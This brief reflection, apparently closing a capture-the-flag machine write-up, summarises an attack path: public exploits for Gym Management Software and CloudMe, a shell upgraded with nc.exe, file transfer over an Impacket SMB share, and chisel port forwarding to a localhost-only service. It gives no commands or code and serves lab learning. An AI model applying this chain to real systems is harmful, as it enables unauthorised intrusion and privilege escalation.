The crucial part was identifying the software running on the machine: Gym Management Software on the web front end for the initial shell, and CloudMe for privilege escalation. Both have public exploits in Exploit-DB. The next lesson was upgrading the initial restricted web shell to a proper one with nc.exe, and transferring files between Windows and Linux with an SMB2-capable Impacket share. Before reaching for privilege-escalation scripts, check the current user's privileges and the locally listening ports and services. Here a localhost-only service was vulnerable, and chisel port forwarding made it reachable from the attacker machine.